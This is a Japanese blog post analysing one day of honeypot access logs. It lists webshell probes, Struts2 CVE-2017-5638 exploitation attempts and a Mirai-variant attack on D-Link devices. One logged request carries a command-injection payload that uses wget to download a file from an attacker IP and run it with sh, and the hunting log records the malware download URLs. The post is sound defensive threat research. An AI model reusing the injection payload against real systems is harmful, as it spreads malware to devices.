S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/05)

ハニーポットのログ分析(2018/08/05)

honeypot

WOWhoneypotの2018/08/05(日) (運用63日目)の簡易分析です。
本日の総アクセス件数は 213件です。以下が全アクセスログです。

35 2018-08-05 GET /
14 2018-08-05 GET /index.action
6 2018-08-05 POST /qq.php
3 2018-08-05 PROPFIND /
3 2018-08-05 POST /xx.php
3 2018-08-05 POST /q.php
3 2018-08-05 POST /qaq.php
2 2018-08-05 POST /zuoshou.php
2 2018-08-05 POST /yao.php
2 2018-08-05 POST /xw.php
2 2018-08-05 POST /xw1.php
2 2018-08-05 POST /xshell.php
2 2018-08-05 POST /xiao.php
2 2018-08-05 POST /xiaoma.php
2 2018-08-05 POST /wuwu11.php
2 2018-08-05 POST /wshell.php
2 2018-08-05 POST /w.php
2 2018-08-05 POST /weixiao.php
2 2018-08-05 POST /webslee.php
2 2018-08-05 POST /wc.php
2 2018-08-05 POST /system.php
2 2018-08-05 POST /s.php
2 2018-08-05 POST /sheep.php
2 2018-08-05 POST /phpstudy.php
2 2018-08-05 POST /pe.php
2 2018-08-05 POST /mx.php
2 2018-08-05 POST /log.php
2 2018-08-05 POST /lindex.php
2 2018-08-05 POST /hm.php
2 2018-08-05 POST /feixiang.php
2 2018-08-05 POST /fack.php
2 2018-08-05 POST /defect.php
2 2018-08-05 POST /db_session.init.php
2 2018-08-05 POST /db.init.php
2 2018-08-05 POST /db__.init.php
2 2018-08-05 POST /data.php
2 2018-08-05 POST /conflg.php
2 2018-08-05 POST /cmd.php
2 2018-08-05 POST /cainiao.php
2 2018-08-05 POST /aotu.php
2 2018-08-05 POST /angge.php
2 2018-08-05 POST /ak47.php
2 2018-08-05 POST /9678.php
2 2018-08-05 HEAD /
2 2018-08-05 GET /webdav/
2 2018-08-05 GET /cmd.php
2 2018-08-05 CONNECT 133.130.126.119:43
1 2018-08-05 POST /zuo.php
1 2018-08-05 POST /yumo.php
1 2018-08-05 POST /xiaomar.php
1 2018-08-05 POST /wp-admins.php
1 2018-08-05 POST /wan.php
1 2018-08-05 POST /wanan.php
1 2018-08-05 POST /test.php
1 2018-08-05 POST /ssaa.php
1 2018-08-05 POST /qwe.php
1 2018-08-05 POST /post.php
1 2018-08-05 POST /mz.php
1 2018-08-05 POST /m.php?pbid=open
1 2018-08-05 POST /min.php
1 2018-08-05 POST /l8.php
1 2018-08-05 POST /l7.php
1 2018-08-05 POST /ip.php
1 2018-08-05 POST /infoo.php
1 2018-08-05 POST /hh.php
1 2018-08-05 POST /h1.php
1 2018-08-05 POST /bak.php
1 2018-08-05 POST /aw.php
1 2018-08-05 POST /ak.php
1 2018-08-05 POST /ak48.php
1 2018-08-05 POST /56.php
1 2018-08-05 POST /3.php
1 2018-08-05 POST /12.php
1 2018-08-05 POST /1213.php
1 2018-08-05 GET /z.php
1 2018-08-05 GET /x.php
1 2018-08-05 GET /wpo.php
1 2018-08-05 GET /wp-config.php
1 2018-08-05 GET /uploader.php
1 2018-08-05 GET /text.php
1 2018-08-05 GET /test.php
1 2018-08-05 GET /shell.php
1 2018-08-05 GET /register.jsp
1 2018-08-05 GET /_query.php
1 2018-08-05 GET /muhstiks.php
1 2018-08-05 GET /muhstik.php
1 2018-08-05 GET /muhstik-dpr.php
1 2018-08-05 GET /muhstik2.php
1 2018-08-05 GET /main.jsp
1 2018-08-05 GET /lol.php
1 2018-08-05 GET /log.php
1 2018-08-05 GET /logon.php
1 2018-08-05 GET /login.jsp
1 2018-08-05 GET /login.do
1 2018-08-05 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-05 GET /login.action
1 2018-08-05 GET /license.php
1 2018-08-05 GET /lala.php
1 2018-08-05 GET /lala-dpr.php
1 2018-08-05 GET /java.php
1 2018-08-05 GET /index.jsp
1 2018-08-05 GET /index.do
1 2018-08-05 GET /help.php
1 2018-08-05 GET /help-e.php
1 2018-08-05 GET /desktop.ini.php
1 2018-08-05 GET /default.jsp
1 2018-08-05 GET /db_pma.php
1 2018-08-05 GET /db_cts.php
1 2018-08-05 GET /cmx.php
1 2018-08-05 GET /cmv.php
1 2018-08-05 GET /cmdd.php
1 2018-08-05 GET /axis2/
1 2018-08-05 GET /appserv.php 

 

phpMyAdmin関連(0件)とPeppa!(phpに対するPOST、GETの調査行為145)と/を除外したアクセス数です。

14 2018-08-05 GET /index.action
2 2018-08-05 GET /webdav/
2 2018-08-05 CONNECT 133.130.126[.]119:43
1 2018-08-05 GET /login.jsp
1 2018-08-05 GET /login.do
1 2018-08-05 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-05 GET /login.action
1 2018-08-05 GET /index.jsp
1 2018-08-05 GET /index.do
1 2018-08-05 GET /default.jsp
1 2018-08-05 GET /axis2/

phpに対するPOSTでHello! Peppa!と出している攻撃が本日は2IPから来ていましたが、POSTだけでなくGETによる調査行為もしてくるようになっています。
この攻撃があると、一日の総アクセス数も増えています。

Struts2脆弱性(CVE-2017-5638)を突く攻撃も複数のパスに対して来ています。.action,.jsp,.doに対するものはこれに該当します。
 実行しようとしていたコマンドはwhoami,history -c等でした。その他、他の攻撃者の攻撃が失敗するようによく使われるコマンド(wget,curl等)が実行できないよう細工(mv)しているケースもありました。

その他は、WebDAVの調査行為、不正中継の調査行為、D-LINKの脆弱性を攻撃するMirai亜種、axis2の調査行為、でした。

 

本日のハンティングログは以下です。

1 2018-08-05 wget hxxp://46.166.185[.]42/e
1 2018-08-05 wget hxxp://104.148.70[.]5:8080/net11 

 

以上です。